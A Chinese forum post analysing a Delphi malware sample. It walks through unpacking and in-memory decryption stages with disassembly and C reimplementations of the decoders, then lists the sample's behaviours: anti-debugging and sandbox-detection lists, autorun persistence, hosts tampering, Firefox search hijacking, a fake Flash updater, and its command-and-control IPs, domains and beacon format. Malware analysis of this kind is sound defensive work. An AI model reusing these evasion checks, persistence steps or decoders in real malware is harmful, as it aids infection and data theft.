一个病毒样本的分析报告
小菜第一次做病毒分析报告,凑合看吧。。。做个笔记。http://bbs.pediy.com/images/smilies/biggrin.gif病毒样本运行后会解密核心PE文件直接在内存里然后调用执行。解密这部分应该算个loader吧。
病毒样本入口点如下,ASPack v2.xx通过ESP定律完成脱壳
004C1000 90 nop
004C1001 >60 pushad
004C1002 E8 03000000 call virus.004C100A
004C1007- E9 EB045D45 jmp 45A914F7
004C100C 55 push ebp
004C100D C3 retn
004C100E E8 01000000 call virus.004C1014
004C1013 EB 5D jmp short virus.004C1072
004C1015 BB EDFFFFFF mov ebx,-0x13
004C101A 03DD add ebx,ebp
004C101C 81EB 00100C00 sub ebx,0xC1000
004C1022 83BD 88040000 0>cmp dword ptr ss:,0x0
004C1029 899D 88040000 mov dword ptr ss:,ebx
脱壳后入口如下,Borland Delphi 6.0 - 7.0
004A852C 55 push ebp
004A852D 8BEC mov ebp,esp
004A852F B9 09000000 mov ecx,0x9
004A8534 6A 00 push 0x0
004A8536 6A 00 push 0x0
004A8538 49 dec ecx
004A8539^ 75 F9 jnz short virus.004A8534
004A853B 53 push ebx
004A853C 56 push esi
004A853D B8 E4844A00 mov eax,virus.004A84E4
004A8542 E8 39BFF5FF call virus.00404480
004A8547 33C0 xor eax,eax
1.第1段数据解密
解密原始数据起始位置0x004A9294 大小0x1DA0
解密后会立即 call 0x004A9294,解密后的数据还是加密解密操作的代码。
004A8686 BE A01D0000 mov esi,0x1DA0 ; str_len = 0x1DA0
004A868B B8 94924A00 mov eax,virus.004A9294 ; *eax = 004A9294
004A8690 BB 81200000 mov ebx,0x2081 ; i = 0x2081
004A8695 3018 xor byte ptr ds:,bl ; *eax^= (i & 0xFF)
004A8697 4B dec ebx ; i--
004A8698 85DB test ebx,ebx
004A869A^ 75 F9 jnz short virus.004A8695 ; if(i > 0 ) goto 004A8695
004A869C 40 inc eax ; *eax++
004A869D 4E dec esi ; str_len--
004A869E^ 75 F0 jnz short virus.004A8690 ; if(str_len > 0 ) goto 004A8690
004A86A0 BB 94924A00 mov ebx,virus.004A9294
004A86A5 B8 DCC74A00 mov eax,virus.004AC7DC
004A86AA E8 F1B2F5FF call virus.004039A0
004A86AF 50 push eax
004A86B0 FFD3 call ebx ; ebx= 解密的数据位置0x004A9294
尝试写的C语言代码1
void main()
{
////0x1DA0大小测试数据1 附件里的代码完整此处省略
int str[] = {0x54,0x8A,0xED,0x80,0xC5,0x9D,0xFA, .........};
int *p = str;
for(int str_len = 0x1da0; 0 < str_len; p++,str_len--)
{
for(int i = 0x2081; 0 < i; i--)
{
*p ^= i & 0xFF;
}
printf("%02x ", *p);
}
printf("\n");
}配图
http://hjwgjd.5331aa3284126.d01.nanoyun.com/tu/109.jpg
http://hjwgjd.5331aa3284126.d01.nanoyun.com/tu/110.png
----------------------------------------------
2.第2段数据解密
004A9BDA 50 push eax ; eax = 0x00A716F4
004A9BDB FF55 C4 call dword ptr ss: ; eax = strlen(eax) := 0x0009FD70
004A9BDE 8BF0 mov esi,eax ; esi = eax
004A9BE0 4E dec esi ; esi--
004A9BE1 85F6 test esi,esi
004A9BE3 7C 15 jl short virus.004A9BFA ; if(esi < 0) goto 004A9BFA
004A9BE5 46 inc esi ; esi++
004A9BE6 33DB xor ebx,ebx ; i = 0
004A9BE8 8B45 08 mov eax,dword ptr ss: ; eax = *str
004A9BEB 8A0418 mov al,byte ptr ds: ; eax = (*(str+i) & 0xFF) | (eax & 0xFFFFFF00)
004A9BEE 34 21 xor al,0x21 ; eax = ((eax & 0xFF) ^ 0x21) | (eax & 0xFFFFFF00)
004A9BF0 8B55 08 mov edx,dword ptr ss: ; edx = *str
004A9BF3 88041A mov byte ptr ds:,al ; *(str+i) = (eax & 0xFF)
004A9BF6 43 inc ebx ; i++
004A9BF7 4E dec esi ; esi--
004A9BF8^ 75 EE jnz short virus.004A9BE8 ; if( 0 < esi) goto 004A9BE8
尝试写的C语言代码2
代码:
void main()
{
int str[] = {0x74,0x6C,0x14,0x46,0x72,0x6F, ..........};//str = 测试数据2
int *p = str;
int len =192; //测试数据长度 = 192,样本长度0x0009FD70
for (int i=0; 0 < len; i++,len--)
{
*(p+i) ^= 0x21;
printf("%02x ", *(p+i));
}
printf("\n");
}
配图
http://hjwgjd.5331aa3284126.d01.nanoyun.com/tu/111.PNG
http://hjwgjd.5331aa3284126.d01.nanoyun.com/tu/112.PNG
----------------------------------------------
3.第3段数据解密
004A9BFA C685 D3FBFFFF 3>mov byte ptr ss:,0x30
004A9C01 C685 D4FBFFFF 3>mov byte ptr ss:,0x31
004A9C08 C685 D5FBFFFF 3>mov byte ptr ss:,0x32
004A9C0F C685 D6FBFFFF 3>mov byte ptr ss:,0x33
.......01234560123456~wxyz+/
004A9D9E C685 0FFXFFFF 7>mov byte ptr ss:,0x79
004A9DA5 C685 10FXFFFF 7>mov byte ptr ss:,0x7A
004A9DAC C685 11FXFFFF 2>mov byte ptr ss:,0x2B
004A9DB3 C685 12FXFFFF 2>mov byte ptr ss:,0x2F
004A9DBA 33C0 xor eax,eax
004A9DBC 8985 50FFFFFF mov dword ptr ss:,eax
004A9DC2 33C0 xor eax,eax
004A9DC4 8985 48FFFFFF mov dword ptr ss:,eax
004A9DCA 33C0 xor eax,eax
004A9DCC 8985 44FFFFFF mov dword ptr ss:,eax
004A9DD2 33C0 xor eax,eax
004A9DD4 8985 4XFFFFFF mov dword ptr ss:,eax
004A9DDA 8B45 08 mov eax,dword ptr ss: ; eax = 加密数据
004A9DDD 50 push eax
004A9DDE FF55 C4 call dword ptr ss: ; eax = strlen(eax) = 0009FD70
004A9DE1 8BF0 mov esi,eax ; esi = eax
004A9DE3 85F6 test esi,esi
004A9DE5 0F8C D1000000 jl virus.004A9EBC ; if(esi < 0) goto 004A9EBC
004A9DEB 46 inc esi ; esi++
004A9DEC 33DB xor ebx,ebx ; i = 0
004A9DEE BA 01000000 mov edx,0x1 ; len_0123wxyz = 1
004A9DF3 8D85 D3FBFFFF lea eax,dword ptr ss: ; eax = 0123456~wxyz+/
004A9DF9 8B4D 08 mov ecx,dword ptr ss: ; ecx = 加密数据
004A9DFC 8A0C19 mov cl,byte ptr ds: ; cl = (*(str+i) & 0xFF)
004A9DFF 3A08 cmp cl,byte ptr ds:
004A9E01 75 0B jnz short virus.004A9E0E ; if( (*str0123 &0xFF) < cl) goto 004A9E0E
004A9E03 8BC2 mov eax,edx
004A9E05 48 dec eax ; len_0123wxyz--
004A9E06 8985 4XFFFFFF mov dword ptr ss:,eax
004A9E0C EB 07 jmp short virus.004A9E15
004A9E0E 42 inc edx ; len_0123wxyz++
004A9E0F 40 inc eax ; str0123++
004A9E10 83FA 41 cmp edx,0x41
004A9E13^ 75 E4 jnz short virus.004A9DF9 ; if( len_0123wxyz < 0x41) goto 004A9DF9
004A9E15 83BD 4XFFFFFF 0>cmp dword ptr ss:,0x0
004A9E1C 0F8C 92000000 jl virus.004A9EB4 ; if( len_0123wxyz <= 0) goto 004A9EB4
004A9E22 8B85 48FFFFFF mov eax,dword ptr ss:
004A9E28 C1E0 06 shl eax,0x6 ; eax = v383 << 6
004A9E2B 0385 4XFFFFFF add eax,dword ptr ss: ; eax += len_0123wxyz
004A9E31 8985 48FFFFFF mov dword ptr ss:,eax ; v383 = eax
004A9E37 8385 50FFFFFF 0>add dword ptr ss:,0x6 ; len3 += 6
004A9E3E 83BD 50FFFFFF 0>cmp dword ptr ss:,0x8
004A9E45 7C 6D jl short virus.004A9EB4 ; if(len3 <= 8) goto 004A9EB4
004A9E47 83AD 50FFFFFF 0>sub dword ptr ss:,0x8 ; len3 -= 8
004A9E4E 8B8D 50FFFFFF mov ecx,dword ptr ss:
004A9E54 8B85 48FFFFFF mov eax,dword ptr ss: ; lenshl = v383
004A9E5A D3E8 shr eax,cl ; lenshl >>= (len3 & 0xFF)
004A9E5C 8985 4XFFFFFF mov dword ptr ss:,eax ; len_0123wxyz = lenshl
004A9E62 8B8D 50FFFFFF mov ecx,dword ptr ss: ; ecx = len3
004A9E68 B8 01000000 mov eax,0x1 ; lenshl =1
004A9E6D D3E0 shl eax,cl ; lenshl <<= (len3 & 0xFF)
004A9E6F 50 push eax ; what = eax
004A9E70 8B85 48FFFFFF mov eax,dword ptr ss: ; eax = len_0123wxyz << 6
004A9E76 5A pop edx ; edx = what
004A9E77 8BCA mov ecx,edx ; ecx = what
004A9E79 99 cdq
004A9E7A F7F9 idiv ecx ; eax = 商, edx = 余
004A9E7C 8995 48FFFFFF mov dword ptr ss:,edx ; 余 = edx
004A9E82 8B85 4XFFFFFF mov eax,dword ptr ss: ; eax = shang
004A9E88 25 FF000080 and eax,0x800000FF ; eax &= 0x800000FF
004A9E8D 79 07 jns short virus.004A9E96 ; if(0 < eax) goto 004A9E96
004A9E8F 48 dec eax ; eax--
004A9E90 0D 00FFFFFF or eax,-0x100 ; eax |= -0x100
004A9E95 40 inc eax ; eax++
004A9E96 8985 4XFFFFFF mov dword ptr ss:,eax ; shang = shang
004A9E9C 8B45 08 mov eax,dword ptr ss: ; eax = 加密数据
004A9E9F 8B95 44FFFFFF mov edx,dword ptr ss: ; edx = len_0xbc
004A9EA5 8B8D 4XFFFFFF mov ecx,dword ptr ss: ; ecx = shang
004A9EAB 880C10 mov byte ptr ds:,cl ; *(加密数据+len_0xbc) = shang
004A9EAE FF85 44FFFFFF inc dword ptr ss: ; len_0xbc++
004A9EB4 43 inc ebx ; i++
004A9EB5 4E dec esi ; esi--
004A9EB6^ 0F85 32FFFFFF jnz virus.004A9DEE ; if(0 < esi) goto 004A9DEE
尝试写的C语言代码3
代码:
void main()
{
int str[] = { 0x55,0x4D,0x35,0x67,0x53,0x4E,0x31,0x61,0x52,0x4D,0x6E,0x74,0x53...... }; // str = 测试数据3
int str2[] = {0x30, 0x31, 0x32, 0x33, 0x34, 0x35, 0x36, 0x37, 0x38, 0x39, 0x41, 0x42, 0x43, 0x44, 0x45, 0x46,
0x47, 0x48, 0x49, 0x4A, 0x4B, 0x4C, 0x4D, 0x4E, 0x4F, 0x50, 0x51, 0x52, 0x53, 0x54, 0x55, 0x56, 0x57, 0x58,
0x59, 0x5A, 0x61, 0x62, 0x63, 0x64, 0x65, 0x66, 0x67, 0x68, 0x69, 0x6A, 0x6B, 0x6C, 0x6D, 0x6E, 0x6F, 0x70,
0x71, 0x72, 0x73, 0x74, 0x75, 0x76, 0x77, 0x78, 0x79, 0x7A, 0x2B, 0x2F};// 0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz+/
int i, len, len_0123wxyz, len3 = 0, len_BC = 0;
int v383=0;
int *p = str;
int *p2 = str2;
for (i = 0, len = 1344/*0x9FD70*/; 0 < len; i++, len--)
{
for( len_0123wxyz = 1; len_0123wxyz < 0x41; len_0123wxyz++)
{
int str3 = (*(p+i) & 0xFF);
if (str3 == *(p2+len_0123wxyz))
{
break;
}
}
if( 0 <= len_0123wxyz)
{
int v384 = v383 = len_0123wxyz + (v383<<6);
len3 += 6;
if(8 <= len3)
{
len3 -= 8;
len_0123wxyz = v383 >> (len3 & 0xFF);
v383 = (signed int)v383 % (1 << len3);
int shang = v384/(1 << len3);
shang &= 0x800000FF;
if(0 < shang)
{
*(p+len_BC) = shang & 0xFF;
if (len_BC%16==0)
{
printf("\n");
}
printf("%02X", *(p+len_BC));
len_BC++;
}
else
{
int c = *p;
c--;
c |= -0x100;
c++;
// (((*p)--) |= -0x100)++;
}
}
}
}
printf("\n");
}
配图
http://hjwgjd.5331aa3284126.d01.nanoyun.com/tu/113.PNG
至此PE文件就解密出来了。可通过 OD脚本 将核心PE文件抓取出来
写C代码的时候还发现一个有趣的事情,应该是我看书太少了吧:
IDA F5 :v383 %=(1 << len3);
我写的 :v383&=(1 << (len3-1));
两个结果是一样的。才知道X % 2^n = X & (2^n - 1)《与运算和取余之间的关系》
----------------------------------------------------------------------------------------------
解密出来的PE文件才是真正的病毒程序母体。。。我不太会分析,马马虎虎整理如下
1,样本的基本信息。
有无壳:有:ASPack v2.12
编写语言:Borland Delphi 6.0 - 7.0
样本MD5: A4EA96485DA00D33BADDBXF87034DEAD
样本大小:505 KB (517,133 字节)
样本编写国家:可能是俄罗斯[依据资源语言为俄语]
2,样本的行为。
1.反调试,发现有调试或抓包软件不作任何事情直接自删除。
2.使用GetStartupInfo 检查自己是否被调试
3.动态加载DLL
4.核心代码加密
5.获取地区+语言
6.读写注册表数据
7.运行后自动删除
8.获取系统信息
9.修改hosts文件
10.写入开机注册表
11.网络连接收发数据
12.向自身进程注入代码
13.可能会下载其他程序
14.修改DNS服务器主机名
15.修改mozilla浏览器信息
16.以挂起方式创建自身进程
17.反OD调试 FindWindowA("OLLYDBG", 0)
18.搜索硬件信息 "IBM-" "MAXTOR" "Maxtor" "WDC "
19.通过IsWow64Process判断系统是否为64位
20.查找文件夹System Volume Information
21.创建文件 c:\cgvi5r6i\vgdgfd.72g\\.\Ip
22.根据不同参数执行不同代码"shortcut" / "opt"
23.复制自身到%TEMP%目录下[随机2位数内]xx.tmp
24.写入%systemroot%\system32\drivers\fastfat.sys驱动文件
25.创建桌面快捷方式 %USERPROFILE%\Desktop\Computer.lnk
26.创建一个命名的事件对象EventName = "{9D723E3C-5DD2-43a4-A593-6C4327DA79DE}"
27.获得系统版本: "wv95";"wv98";"wvNT";"wv2k";"wvME";"wvXP";"wv2k3";"wvVista";"wv2k8";"wv7"; "wvUnknown";
28.伪装adobe flash player升级程序 FindResource(a1, 0x71, "IMAGE"); 资源为伪装的adobe flash player升级程序[英文界面]--------->>adobe_flash.jpg
http://hjwgjd.5331aa3284126.d01.nanoyun.com/tu/114.jpg
29.连接以下可疑网址与IP
94.23.116.81 / 217.23.15.124 / 69.57.173.222 / 212.117.176.187
findgala.com / update1.randomstring.com / update1.randomstring.com/update_c1eec.exe
3,样本的详细分析。
1.判断有无以下程序和注册表信息,判断电脑用户是否为调试机,是调试机不做任何木马行为,停止运行并自动删除:--------->>is调试机.jpg
http://hjwgjd.5331aa3284126.d01.nanoyun.com/tu/115.JPG
cv.exe irise.exe IrisSvc.exe wireshark.exe dumpcap.exe ZxSniffer.exe Aircrack-ng Gui.exe observer.exe tcpdump.exe
SandboxieDcomLaunch.exe SUPERAntiSpyware.exe ERUNT.exe ERDNT.exe EtherD.exe Sniffer.exe CamtasiaStudio.exe CamRecorder.exe
windbg.exe DrvLoader.exe SymRecv.exe Syser.exe apis32.exe VBoxService.exe VBoxTray.exe SbieSvc.exe SbieCtrl.exe SandboxieRpcSs.exe
WinDump.exe wspass.exe Regshot.exe ollydbg.exe PEBrowseDbg.exe
注册表
Software\CommView SYSTEM\CurrentControlSet\Services\IRIS5 Software\eEye Digital Security
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Wireshark
SOFTWARE\Microsoft\Windows\CurrentVersion\AppPaths\wireshark.exe
SOFTWARE\ZxSniffer SOFTWARE\Cygwin SOFTWARE\B Labs\Bopup Observer
AppEvents\Schemes\Apps\Bopup Observer Software\B Labs\BopupObserver
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Win Sniffer_is1
Software\Win Sniffer SOFTWARE\Classes\PEBrowseDotNETProfiler.DotNETProfiler
Software\Microsoft\Windows\CurrentVersion\Explorer\MenuOrder\Start Menu2\Programs\Debugging Tools for Windows (x86)
SYSTEM\CurrentControlSet\Services\SDbgMsg
Software\Microsoft\Windows\CurrentVersion\Explorer\MenuOrder\Start Menu2\Programs\APIS32
Software\Syser Soft
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\APIS32
SOFTWARE\APIS32
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Oracle VM VirtualBox Guest Additions
SYSTEM\CurrentControlSet\Services\VBoxGuest
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Sandboxie
SYSTEM\CurrentControlSet\Services\SbieDrv
Software\Classes\Folder\shell\sandbox
Software\Classes\*\shell\sandbox
SOFTWARE\SUPERAntiSpyware.com
SOFTWARE\Classes\SUPERAntiSpywareContextMenuExt.SASCon.1
SOFTWARE\SUPERAntiSpyware.com
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ERUNT_is1
2.获取系统信息构造特定数据包发送到IP:94.23.116.81
wv=wvXP&uid=9&lng=zh-CN&mid=8D49E3F750F478A2B43E61BA70EE5071&res=10000200000100000000&v=000000FF
http://update.l75mchxox29.com?x7 ... caXpphm0XBrpMnL3KCc
3.包含以下字符串通过sscanf读取指定格式的数据,读取内容全部为IP地址。
szString="94.23.116.81/"
szFormat="%[^/]%s"
szString="217.23.15.124/"
szFormat="%[^/]%s"
szString="69.57.173.222"
szFormat="%s"
szString="www.google-analytics.com.=64.125.87.101"
szFormat="%[^=]"
szString="ad-emea.doubleclick.net.=64.125.87.101"
szFormat="%[^=]"
szString="www.statcounter.com.=64.125.87.101"
szFormat="%[^=]"
4.模拟Mozilla/4.0发送数据
"GET %s?%s HTTP/1.1\r\nHost: %s\r\nUser-Agent: %s\r\n\r\n",
"Mozilla/4.0 (compatible; MSIE 8.0; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.0.04506.590; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)");
5.根据注册表获取Mozilla目录修改prefs.js文件
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
读取AppData
搜索\Mozilla\Firefox\Profiles\
修改prefs.js
修改user_pref(\"general.useragent.extra.%s\", \"%s\
6.写入mozilla浏览器搜索配置信息
打开mozilla目录\searchplugins\search.xml
写入
<SearchPlugin xmlns=\"http://www.mozilla.org/2006/browser/search/\">
<ShortName>search</ShortName>\n");
<Description>Search for the best price.</Description>
<InputEncoding>windows-1251</InputEncoding>
<Image width=\"16\" height=\"16\">data:image/x-icon;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAIAAACQkWg2AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJbWFnZVJlYWR5ccllPAAAAaRJREFUeNpiVIg5JRURw0A0YAHio943kYV%2B%2Ff33%2BdvvX7%2F%2FMjEx8nKycrGzwKXOiPKzICvdeezLhCV3jp15%2Bfv%2FX0YGhv8MDDxMX2qKTIw0RK10eYD6QYqATvoPBkt3f5K0W9Ew4fjTFz%2F%2Bw8Dm3W8UPeZxqFa%2BevsFyD0twgfVsOfkRxHrtfV9u5BVQ8Crd98%2FffkGYQM1QJ20%2FfSPv79eNxQGYfpSVJADmcvEAHbr7oOX2dj%2FERNKIA2%2F%2F%2Fz%2FxfCDhYVoDUDw5P6vf9%2B5iY0HVmZGQWm%2BN3fff%2Fn2k4eLHS739x%2FDiRs%2Ff%2F%2F5x8HO%2FOHzN3djfqgNjIwMgc6qzLx%2Fpy47j2zY%2Feff06tXhOUucgxeun33AUZGpHh4%2Bvo7t8EyIJqz%2FhpasD59%2B5dNrqdnznZIsEL9ICXCsWuBCwvTv%2FymS5PWPP32ExEALz%2F%2BB5r848cPCJcRaMP9xaYQzofPPzfuvrnj0Jst%2B5%2F8%2Bc4sLPeDkYlRgJc93VPE18NIXkYUmJYQSQMZ%2FP3379uPH7%2F%2F%2FEETBzqJ0WqLGvFpe2LCC4AAAwAyjg7ENzDDWAAAAABJRU5ErkJggg%3D%3D</Image>
<Url type=\"text/html\" method=\"GET\" template=\"%s\">\n", "http://findgala.com/?"
<Param name=\"q\" value=\"{searchTerms}\"/>\n");
<Param name=\"uid\" value=\"%d\"/>\n", dword_425820
</Url>
</SearchPlugin>
7.复制文件,写入开机启动项注册表,并加opt参数--------->>开机注册表.jpg
http://hjwgjd.5331aa3284126.d01.nanoyun.com/tu/116.JPG
复制文件到 %Application Data%\yWSK9y1.exe
写入 HKEY_CURRENT_USER SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
"%Application Data%\yWSK9y1.exe opt"
http://bbs.pediy.com/images/smilies/biggrin.gifove
路过,学习下 楼主,不论什么情况你一定要hold住!hold住就是胜利! 看看...~ 看看楼主发的是什么 我来赚一个 谢谢! 没啥说的先顶在下!!!!!!!!!! 为毛老子总也抢不到沙发?!! 占位编辑 好帖必须得顶起
页:
[1]
2